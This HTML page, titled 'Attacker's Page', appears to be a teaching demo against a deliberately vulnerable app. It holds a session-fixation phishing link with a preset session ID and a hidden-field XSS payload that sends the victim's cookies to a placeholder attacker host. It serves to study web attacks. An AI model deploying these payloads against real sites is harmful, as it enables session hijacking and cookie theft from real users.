<!doctype html>
<html>
    <head>
        <title>Attacker's Page</title>
    </head>
    <body>
        <h1>Welcome to my 100% legit website!</h1>

        <h3>Session Fixation</h3>
        <p>
            <a
                href="${VULN_APP_URL}/login?session_id=69420-6736"
                target="_blank"
            >
                Click here to log in and claim your money!
            </a>
        </p>
        <hr />

        <h3>XSS Cookie Stealing Demo</h3>
        <p>(You must be logged in to vuln-app for this to work)</p>
        <form
            action="${VULN_APP_URL}/dashboard"
            method="GET"
            target="_blank"
        >
            <input
                type="hidden"
                name="display_name"
                value="<script>new Image().src='${ATTACKER_APP_URL}/steal?c='+document.cookie</script>"
            />
            <button>Click here to see your prizes!</button>
        </form>
    </body>
</html>
